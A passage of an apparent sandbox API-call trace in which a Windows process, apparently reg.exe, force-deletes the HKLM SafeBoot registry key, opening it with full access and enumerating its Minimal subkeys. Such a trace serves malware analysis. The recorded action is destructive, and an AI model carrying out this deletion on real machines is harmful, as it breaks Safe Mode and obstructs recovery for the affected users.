Size=0x14) returned 0x524e58 [0085.503] GetProcessHeap () returned 0x510000 [0085.507] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x524e78 [0085.507] GetProcessHeap () returned 0x510000 [0085.507] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x524e98 [0085.507] SetThreadUILanguage (LangId=0x0) returned 0x409 [0085.507] GetProcessHeap () returned 0x510000 [0085.507] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x10) returned 0x51f0c0 [0085.508] _memicmp (_Buf1=0x51f0c0, _Buf2=0x1c1318, _Size=0x7) returned 0 [0085.508] GetProcessHeap () returned 0x510000 [0085.508] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x1e) returned 0x523f78 [0085.508] lstrlenW (lpString="HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot") returned 46 [0085.508] GetProcessHeap () returned 0x510000 [0085.508] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x10) returned 0x51f0d8 [0085.508] _memicmp (_Buf1=0x51f0d8, _Buf2=0x1c1318, _Size=0x7) returned 0 [0085.508] GetProcessHeap () returned 0x510000 [0085.508] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x64) returned 0x525038 [0085.508] _vsnwprintf (in: _Buffer=0x523f78, _BufferCount=0xe, _Format="|%s|", _ArgList=0x30f9bc | out: _Buffer="|-?|/?|-h|/h|") returned 13 [0085.508] _vsnwprintf (in: _Buffer=0x525038, _BufferCount=0x31, _Format="|%s|", _ArgList=0x30f9bc | out: _Buffer="|HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot|") returned 48 [0085.508] lstrlenW (lpString="|-?|/?|-h|/h|") returned 13 [0085.508] lstrlenW (lpString="|HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot|") returned 48 [0085.508] SetLastError (dwErrCode=0x490) [0085.508] lstrlenW (lpString="HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot") returned 46 [0085.508] GetProcessHeap () returned 0x510000 [0085.508] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x5e) returned 0x5250a8 [0085.508] lstrlenW (lpString="HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot") returned 46 [0085.508] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0085.508] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0085.508] StrChrW (lpStart=" \x09", wMatch=0x4b) returned 0x0 [0085.508] StrChrW (lpStart=" \x09", wMatch=0x4c) returned 0x0 [0085.509] StrChrW (lpStart=" \x09", wMatch=0x4d) returned 0x0 [0085.509] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0085.509] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0085.509] StrChrW (lpStart=" \x09", wMatch=0x59) returned 0x0 [0085.509] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0085.509] StrChrW (lpStart=" \x09", wMatch=0x54) returned 0x0 [0085.509] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0085.509] StrChrW (lpStart=" \x09", wMatch=0x4d) returned 0x0 [0085.509] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0085.509] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0085.509] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0085.509] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0085.509] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0085.509] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0085.509] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0085.509] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0085.509] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0085.509] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0085.509] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0085.509] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0085.509] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0085.509] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0085.509] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0085.509] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0085.510] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0085.510] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0085.510] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0085.510] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0085.510] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0085.510] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0085.510] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0085.510] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0085.510] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0085.510] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0085.510] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0085.510] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0085.510] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0085.510] StrChrW (lpStart=" \x09", wMatch=0x66) returned 0x0 [0085.510] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0085.510] StrChrW (lpStart=" \x09", wMatch=0x42) returned 0x0 [0085.510] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0085.510] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0085.510] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0085.510] lstrlenW (lpString="HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot") returned 46 [0085.510] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot", cchCount1=2, lpString2="\\\\", cchCount2=2) returned 3 [0085.510] lstrlenW (lpString="HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot") returned 46 [0085.510] lstrlenW (lpString="HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot") returned 46 [0085.510] StrChrIW (lpStart="HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot", wMatch=0x5c) returned="\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot" [0085.511] lstrlenW (lpString="HKEY_CURRENT_CONFIG") returned 19 [0085.511] GetProcessHeap () returned 0x510000 [0085.511] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x28) returned 0x525238 [0085.512] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKCU", cchCount2=-1) returned 3 [0085.512] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKEY_CURRENT_USER", cchCount2=-1) returned 3 [0085.512] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKCR", cchCount2=-1) returned 3 [0085.512] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKEY_CLASSES_ROOT", cchCount2=-1) returned 3 [0085.512] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKCC", cchCount2=-1) returned 3 [0085.512] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKEY_CURRENT_CONFIG", cchCount2=-1) returned 3 [0085.512] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKLM", cchCount2=-1) returned 2 [0085.512] lstrlenW (lpString="SYSTEM\\CurrentControlSet\\Control\\SafeBoot") returned 41 [0085.512] lstrlenW (lpString="SYSTEM\\CurrentControlSet\\Control\\SafeBoot") returned 41 [0085.512] lstrlenW (lpString="SYSTEM\\CurrentControlSet\\Control\\SafeBoot") returned 41 [0085.512] StrChrIW (lpStart="SYSTEM\\CurrentControlSet\\Control\\SafeBoot", wMatch=0x5c) returned="\\CurrentControlSet\\Control\\SafeBoot" [0085.512] lstrlenW (lpString="SYSTEM\\CurrentControlSet\\Control\\SafeBoot") returned 41 [0085.512] StrChrIW (lpStart="CurrentControlSet\\Control\\SafeBoot", wMatch=0x5c) returned="\\Control\\SafeBoot" [0085.512] lstrlenW (lpString="SYSTEM\\CurrentControlSet\\Control\\SafeBoot") returned 41 [0085.512] StrChrIW (lpStart="Control\\SafeBoot", wMatch=0x5c) returned="\\SafeBoot" [0085.512] lstrlenW (lpString="SYSTEM\\CurrentControlSet\\Control\\SafeBoot") returned 41 [0085.512] StrChrIW (lpStart="SafeBoot", wMatch=0x5c) returned 0x0 [0085.512] SetLastError (dwErrCode=0x490) [0085.512] lstrlenW (lpString="SYSTEM\\CurrentControlSet\\Control\\SafeBoot") returned 41 [0085.512] SetLastError (dwErrCode=0x0) [0085.512] lstrlenW (lpString="SYSTEM\\CurrentControlSet\\Control\\SafeBoot") returned 41 [0085.512] GetProcessHeap () returned 0x510000 [0085.513] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x54) returned 0x525268 [0085.513] GetProcessHeap () returned 0x510000 [0085.513] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x80) returned 0x5252c8 [0085.513] GetProcessHeap () returned 0x510000 [0085.513] GetProcessHeap () returned 0x510000 [0085.513] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525238) returned 1 [0085.513] GetProcessHeap () returned 0x510000 [0085.513] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525238) returned 0x28 [0085.513] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525238 | out: hHeap=0x510000) returned 1 [0085.513] GetProcessHeap () returned 0x510000 [0085.513] GetProcessHeap () returned 0x510000 [0085.513] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5250a8) returned 1 [0085.513] GetProcessHeap () returned 0x510000 [0085.513] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5250a8) returned 0x5e [0085.513] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5250a8 | out: hHeap=0x510000) returned 1 [0085.513] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0085.513] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0085.513] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/va", cchCount2=-1) returned 1 [0085.513] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/f", cchCount2=-1) returned 2 [0085.514] SetLastError (dwErrCode=0x0) [0085.514] GetProcessHeap () returned 0x510000 [0085.514] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525368 [0085.514] GetProcessHeap () returned 0x510000 [0085.514] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525388 [0085.514] GetProcessHeap () returned 0x510000 [0085.514] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x10) returned 0x51f0f0 [0085.514] _memicmp (_Buf1=0x51f0f0, _Buf2=0x1c1318, _Size=0x7) returned 0 [0085.514] GetProcessHeap () returned 0x510000 [0085.514] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x200) returned 0x525b50 [0085.514] LoadStringW (in: hInstance=0x0, uID=0xc9, lpBuffer=0x525b50, cchBufferMax=256 | out: lpBuffer="Permanently delete the registry key %s (Yes/No)? ") returned 0x31 [0085.515] lstrlenW (lpString="Permanently delete the registry key %s (Yes/No)? ") returned 49 [0085.515] GetProcessHeap () returned 0x510000 [0085.515] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x64) returned 0x525d58 [0085.515] _memicmp (_Buf1=0x51f0f0, _Buf2=0x1c1318, _Size=0x7) returned 0 [0085.515] LoadStringW (in: hInstance=0x0, uID=0xce, lpBuffer=0x525b50, cchBufferMax=256 | out: lpBuffer="YNA") returned 0x3 [0085.515] lstrlenW (lpString="YNA") returned 3 [0085.515] GetProcessHeap () returned 0x510000 [0085.515] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x8) returned 0x524ef0 [0085.515] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Control\\SafeBoot", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f9f8 | out: phkResult=0x30f9f8*=0x74) returned 0x0 [0085.515] RegQueryInfoKeyW (in: hKey=0x74, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x30f9e0, lpcbMaxSubKeyLen=0x30f9f4, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x30f9e0*=0x2, lpcbMaxSubKeyLen=0x30f9f4, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.515] GetProcessHeap () returned 0x510000 [0085.515] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x10) returned 0x51f108 [0085.515] GetProcessHeap () returned 0x510000 [0085.515] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x22) returned 0x525238 [0085.515] RegEnumKeyExW (in: hKey=0x74, dwIndex=0x0, lpName=0x525238, lpcchName=0x30f9ec, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Minimal", lpcchName=0x30f9ec, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.515] lstrlenW (lpString="Minimal") returned 7 [0085.516] GetProcessHeap () returned 0x510000 [0085.516] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x10) returned 0x51f120 [0085.516] GetProcessHeap () returned 0x510000 [0085.516] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5253a8 [0085.516] RegEnumKeyExW (in: hKey=0x74, dwIndex=0x1, lpName=0x525238, lpcchName=0x30f9ec, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Network", lpcchName=0x30f9ec, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.516] lstrlenW (lpString="Network") returned 7 [0085.516] GetProcessHeap () returned 0x510000 [0085.516] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x10) returned 0x51f138 [0085.516] GetProcessHeap () returned 0x510000 [0085.516] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5253c8 [0085.516] GetProcessHeap () returned 0x510000 [0085.516] GetProcessHeap () returned 0x510000 [0085.516] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525238) returned 1 [0085.516] GetProcessHeap () returned 0x510000 [0085.516] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525238) returned 0x22 [0085.516] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525238 | out: hHeap=0x510000) returned 1 [0085.516] RegOpenKeyExW (in: hKey=0x74, lpSubKey="Minimal", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f9b4 | out: phkResult=0x30f9b4*=0x78) returned 0x0 [0085.516] RegQueryInfoKeyW (in: hKey=0x78, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x30f99c, lpcbMaxSubKeyLen=0x30f9b0, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x30f99c*=0x3b, lpcbMaxSubKeyLen=0x30f9b0, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.516] GetProcessHeap () returned 0x510000 [0085.516] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x10) returned 0x525de0 [0085.517] GetProcessHeap () returned 0x510000 [0085.517] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x9e) returned 0x5261c8 [0085.517] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x0, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="AppInfo", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.517] lstrlenW (lpString="AppInfo") returned 7 [0085.517] GetProcessHeap () returned 0x510000 [0085.517] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x10) returned 0x525df8 [0085.517] GetProcessHeap () returned 0x510000 [0085.517] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5253e8 [0085.517] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x1, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="AppMgmt", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.517] lstrlenW (lpString="AppMgmt") returned 7 [0085.517] GetProcessHeap () returned 0x510000 [0085.517] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x10) returned 0x525e10 [0085.517] GetProcessHeap () returned 0x510000 [0085.517] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525408 [0085.517] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x2, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Base", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.518] lstrlenW (lpString="Base") returned 4 [0085.518] GetProcessHeap () returned 0x510000 [0085.518] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0xa) returned 0x525e28 [0085.518] GetProcessHeap () returned 0x510000 [0085.518] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525428 [0085.518] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x3, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Boot Bus Extender", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.518] lstrlenW (lpString="Boot Bus Extender") returned 17 [0085.518] GetProcessHeap () returned 0x510000 [0085.518] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x24) returned 0x525238 [0085.518] GetProcessHeap () returned 0x510000 [0085.518] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525448 [0085.518] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x4, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Boot file system", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.518] lstrlenW (lpString="Boot file system") returned 16 [0085.518] GetProcessHeap () returned 0x510000 [0085.518] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x22) returned 0x5250a8 [0085.518] GetProcessHeap () returned 0x510000 [0085.518] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525468 [0085.518] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x5, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="CryptSvc", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.518] lstrlenW (lpString="CryptSvc") returned 8 [0085.518] GetProcessHeap () returned 0x510000 [0085.518] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x12) returned 0x525488 [0085.518] GetProcessHeap () returned 0x510000 [0085.519] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5254a8 [0085.519] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x6, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="DcomLaunch", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.519] lstrlenW (lpString="DcomLaunch") returned 10 [0085.519] GetProcessHeap () returned 0x510000 [0085.519] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x16) returned 0x5254c8 [0085.519] GetProcessHeap () returned 0x510000 [0085.519] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5254e8 [0085.519] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x7, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="EFS", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.519] lstrlenW (lpString="EFS") returned 3 [0085.519] GetProcessHeap () returned 0x510000 [0085.519] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x8) returned 0x523ab8 [0085.519] GetProcessHeap () returned 0x510000 [0085.519] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525508 [0085.520] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x8, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="EventLog", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.520] lstrlenW (lpString="EventLog") returned 8 [0085.520] GetProcessHeap () returned 0x510000 [0085.520] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x12) returned 0x525528 [0085.520] GetProcessHeap () returned 0x510000 [0085.520] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525548 [0085.520] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x9, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="File system", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.520] lstrlenW (lpString="File system") returned 11 [0085.520] GetProcessHeap () returned 0x510000 [0085.520] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x18) returned 0x525568 [0085.520] GetProcessHeap () returned 0x510000 [0085.520] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525588 [0085.520] RegEnumKeyExW (in: hKey=0x78, dwIndex=0xa, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Filter", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.520] lstrlenW (lpString="Filter") returned 6 [0085.520] GetProcessHeap () returned 0x510000 [0085.520] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0xe) returned 0x525e40 [0085.520] GetProcessHeap () returned 0x510000 [0085.521] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5255a8 [0085.521] RegEnumKeyExW (in: hKey=0x78, dwIndex=0xb, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HelpSvc", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.521] lstrlenW (lpString="HelpSvc") returned 7 [0085.521] GetProcessHeap () returned 0x510000 [0085.521] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x10) returned 0x525e58 [0085.521] GetProcessHeap () returned 0x510000 [0085.521] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5255c8 [0085.521] RegEnumKeyExW (in: hKey=0x78, dwIndex=0xc, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="KeyIso", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.521] lstrlenW (lpString="KeyIso") returned 6 [0085.521] GetProcessHeap () returned 0x510000 [0085.521] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0xe) returned 0x525e70 [0085.521] GetProcessHeap () returned 0x510000 [0085.521] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5255e8 [0085.521] RegEnumKeyExW (in: hKey=0x78, dwIndex=0xd, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Netlogon", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.521] lstrlenW (lpString="Netlogon") returned 8 [0085.521] GetProcessHeap () returned 0x510000 [0085.521] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x12) returned 0x525608 [0085.521] GetProcessHeap () returned 0x510000 [0085.521] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525628 [0085.521] RegEnumKeyExW (in: hKey=0x78, dwIndex=0xe, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="NTDS", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.521] lstrlenW (lpString="NTDS") returned 4 [0085.522] GetProcessHeap () returned 0x510000 [0085.522] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0xa) returned 0x525e88 [0085.522] GetProcessHeap () returned 0x510000 [0085.522] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525648 [0085.522] RegEnumKeyExW (in: hKey=0x78, dwIndex=0xf, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="PCI Configuration", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.522] lstrlenW (lpString="PCI Configuration") returned 17 [0085.522] GetProcessHeap () returned 0x510000 [0085.522] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x24) returned 0x5250d8 [0085.522] GetProcessHeap () returned 0x510000 [0085.522] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525668 [0085.522] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x10, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="PlugPlay", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.522] lstrlenW (lpString="PlugPlay") returned 8 [0085.522] GetProcessHeap () returned 0x510000 [0085.522] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x12) returned 0x525688 [0085.522] GetProcessHeap () returned 0x510000 [0085.522] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5256a8 [0085.522] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x11, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="PNP Filter", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.522] lstrlenW (lpString="PNP Filter") returned 10 [0085.522] GetProcessHeap () returned 0x510000 [0085.522] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, 